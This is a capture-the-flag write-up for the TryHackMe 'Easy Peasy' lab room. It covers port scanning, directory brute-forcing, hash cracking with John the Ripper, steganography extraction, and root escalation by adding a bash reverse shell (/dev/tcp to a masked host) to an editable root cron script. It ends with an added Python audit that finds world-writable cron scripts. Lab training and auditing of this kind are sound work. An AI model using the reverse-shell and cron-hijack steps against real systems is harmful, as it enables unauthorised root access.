THM — Easy Peasy
Notes on THM Room
Enumeration through nmap
nmap -p- -A 10.10.107.122
How many ports are open?
3 — Port 80, 6498, 65534
What is the version of nginx?
What is running on the highest port?
Compromising the Machine
Using GoBuster, find flag 1.
By The Dark Raver
-----------------
START_TIME: Thu Sep 23 20:40:33 2021
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.107.122/ ----
==> DIRECTORY: http://10.10.107.122/hidden/
+ http://10.10.107.122/index.html (CODE:200|SIZE:612)
+ http://10.10.107.122/robots.txt (CODE:200|SIZE:43)
---- Entering directory: http://10.10.107.122/hidden/ ----
+ http://10.10.107.122/hidden/index.html (CODE:200|SIZE:390)
==> DIRECTORY: http://10.10.107.122/hidden/whatever/
---- Entering directory: http://10.10.107.122/hidden/whatever/ ----
+ http://10.10.107.122/hidden/whatever/index.html (CODE:200|SIZE:435)
END_TIME: Thu Sep 23 20:40:40 2021
DOWNLOADED: 13836 - FOUND: 4
Heading to the path /hidden/whatever we find an image titled "dead end". Using the inspector in Firefox we can read the page source. Within the source there is a hidden string enclosed in <p> tags. Decoding it with Base64 gives us our first flag.
Further enumerate the machine, what is flag 2?
Since we didn't find any more interesting information on port 80 we moved on to port 65524 (we could attempt to brute-force SSH, but let's keep looking for more info). Cracking the MD5 hash gives us the flag for the second question.
Crack the hash with easypeasy.txt, What is the flag 3?
We find the third flag in the default page of the Apache web server. We then crack the hash, which we find out is MD5.
What is the hidden directory?
Within the source code for the Apache homepage we find another hidden message. This message states that the given text is encoded in a ba… My guesses include Base64, so we use CyberChef to decode it and find the hidden directory.
Using the wordlist provided to you in this task, crack the hash. What is the password?
The hint tells us that the hash was produced with GOST. We can use John the Ripper to crack it.
john --format=gost --wordlist=/root/Desktop/easypeasy.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:00 DONE (2021-09-23 22:08) 50.00g/s 384000p/s 384000c/s 384000C/s mypasswordforthatjob
Use the "--show" option to display all of the cracked passwords reliably
What is the password to login to the machine via SSH?
Before moving on to the SSH port, we first download the image located in the hidden directory. We then use steghide to check whether anything is hidden within the file. Using the previously cracked password we extract a secret text file, which contains the username and the password (in binary) for the SSH login.
steghide extract -sf image.jpg
wrote extracted data to "secrettext.txt".
root@ip-10-10-32-53:~/Desktop# cat secrettext.txt
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
Converting the binary to ASCII gives the password: iconvertedmypasswordtobinary
What is the user flag?
Logging into the SSH server, we find a file called user.txt. Since the message says it has been rotated, we can try dCode to find the right rotation. We try ROT13 and get the flag.
boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
What is the root flag?
To get the root flag we have to escalate our privileges. For this we use linPEAS, a great tool for finding privilege escalation paths. We first use the secure copy command (scp) to transfer the .sh file over.
scp -P 6498 linpeas.sh email@example.com:/tmp/
Once the file is copied over we run linPEAS and find an interesting file named mysecretcronjob.
Opening the file we see that it is a bash script, and since we can edit it we can insert our own reverse shell and catch it with a listener. You can find good reverse shells on Pentest Monkey.
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
# i will run as root
bash -i >& /dev/tcp/**.**.**.**/4444 0>&1
On our own computer we set up a listener:
nc -lvnp 4444
Once we run our command we're able to gain root and find the flag.
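The root flag above depends on a script run from root's crontab that the low-privileged user can edit. As an added example (not from the original writeup, with hypothetical file names and a constructed fixture), this Python audit parses crontab entries and reports any referenced file that group or world can write, which is the misconfiguration a defender would want to catch before it is abused:

```python
import os
import stat
import tempfile

def writable_by_others(path):
    """True if the file has a group/world write bit, or sits in a
    world-writable directory without the sticky bit (file can be replaced)."""
    mode = os.stat(path).st_mode
    dir_mode = os.stat(os.path.dirname(path) or ".").st_mode
    file_bad = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
    dir_bad = bool(dir_mode & stat.S_IWOTH) and not (dir_mode & stat.S_ISVTX)
    return file_bad or dir_bad

def find_writable_cron_scripts(crontab_text):
    """Return sorted (path, octal mode) pairs for every existing file that a
    crontab entry references by absolute path and that other users could modify."""
    findings = {}
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blanks and comments; VAR=value lines match no path below
        for tok in line.split():
            tok = tok.rstrip(";&|")
            if tok.startswith("/") and os.path.isfile(tok) and writable_by_others(tok):
                findings[tok] = oct(stat.S_IMODE(os.stat(tok).st_mode))
    return sorted(findings.items())

def demo():
    """Constructed fixture (hypothetical paths): a root crontab that runs one
    script left mode 0666, as in the room, next to a correctly protected one."""
    workdir = tempfile.mkdtemp()
    os.chmod(workdir, 0o755)            # mkdtemp gives 0700; use a normal dir mode
    cronjob = os.path.join(workdir, ".mysecretcronjob.sh")
    backup = os.path.join(workdir, "backup.sh")
    for p in (cronjob, backup):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\n# i will run as root\n")
    os.chmod(cronjob, 0o666)            # the misconfiguration: anyone can edit it
    os.chmod(backup, 0o755)
    crontab = (
        "# m h dom mon dow command\n"
        f"* * * * * /bin/bash {cronjob}\n"
        f"0 3 * * * {backup} >/dev/null 2>&1\n"
    )
    return [os.path.basename(p) for p, _ in find_writable_cron_scripts(crontab)]

if __name__ == "__main__":
    print(demo())  # → ['.mysecretcronjob.sh']
```

On a real host, feed it the contents of /etc/crontab, /etc/cron.d/* and root's crontab; anything it reports should be owned by root with mode 0755 or tighter.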